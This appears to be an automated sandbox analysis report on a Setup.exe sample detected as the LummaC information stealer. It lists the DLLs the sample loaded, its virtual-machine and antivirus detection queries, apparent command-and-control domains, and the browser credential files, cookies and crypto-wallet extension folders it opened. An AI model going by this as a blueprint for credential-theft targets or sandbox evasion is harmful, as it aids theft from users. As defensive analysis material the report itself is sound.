              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Setup.exeStatic file information: File size 76573072 > 1048576
              Source: Setup.exeStatic PE information: section name: RT_CURSOR
              Source: Setup.exeStatic PE information: section name: RT_BITMAP
              Source: Setup.exeStatic PE information: section name: RT_ICON
              Source: Setup.exeStatic PE information: section name: RT_MENU
              Source: Setup.exeStatic PE information: section name: RT_DIALOG
              Source: Setup.exeStatic PE information: section name: RT_STRING
              Source: Setup.exeStatic PE information: section name: RT_ACCELERATOR
              Source: Setup.exeStatic PE information: section name: RT_GROUP_ICON
              Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x174000
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB68 push 680078CBh; retf 0_3_0078CB6D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C264 pushad ; retn 0078h0_3_0078C265
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB58 push esp; retf 0_3_0078CB59
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C250 push eax; retn 0078h0_3_0078C251
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C254 push eax; retn 0078h0_3_0078C255
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB47 push esp; retf 0_3_0078CB55
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CA34 push 0C0078CAh; retf 0_3_0078CA51
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007901A5 push eax; retf 0_3_007901C9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03568850 push es; iretd 0_3_03568869
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0356AA6B push eax; retf 0_3_0356AAD9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03564E01 pushad ; retn 007Eh0_3_03564E15
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03568AC2 push ebp; iretd 0_3_03568AF1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_03569884 pushad ; retn 007Eh0_3_03569885
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0356C08B pushad ; retn 007Eh0_3_0356C095
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB68 push 680078CBh; retf 0_3_0078CB6D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C264 pushad ; retn 0078h0_3_0078C265
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB58 push esp; retf 0_3_0078CB59
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C250 push eax; retn 0078h0_3_0078C251
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C254 push eax; retn 0078h0_3_0078C255
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB47 push esp; retf 0_3_0078CB55
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CA34 push 0C0078CAh; retf 0_3_0078CA51
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007901A5 push eax; retf 0_3_007901C9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB68 push 680078CBh; retf 0_3_0078CB6D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C264 pushad ; retn 0078h0_3_0078C265
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB58 push esp; retf 0_3_0078CB59
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C250 push eax; retn 0078h0_3_0078C251
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078C254 push eax; retn 0078h0_3_0078C255
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CB47 push esp; retf 0_3_0078CB55
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0078CA34 push 0C0078CAh; retf 0_3_0078CA51
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007901A5 push eax; retf 0_3_007901C9
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 2720Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exe, 00000000.00000002.4119245539.0000000000761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: Setup.exe, Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120119900.0000000002800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: uXYiKnvCU8wQCIU7UgfhKoKRPsuCptaN1Fo7+6eVHFnXGUtZAqEmuGRt7xUhb45a
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120119900.0000000002800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: uXYiKnvCU8wQCIU7UgfhKoKRPsuCptaN1Fo7+6eVHFnXGUtZAqEmuGRt7xUhb45a"
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: Setup.exe, 00000000.00000002.4120222692.00000000028A5000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: sloppymisskr.click
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Setup.exe, 00000000.00000003.1902962839.00000000035A5000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1902962839.0000000003594000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Setup.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: Setup.exeString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Setup.exeString found in binary or memory: Jaxx Liberty
              Source: Setup.exeString found in binary or memory: window-state.json
              Source: Setup.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exeString found in binary or memory: Wallets/Ethereum
              Source: Setup.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Setup.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
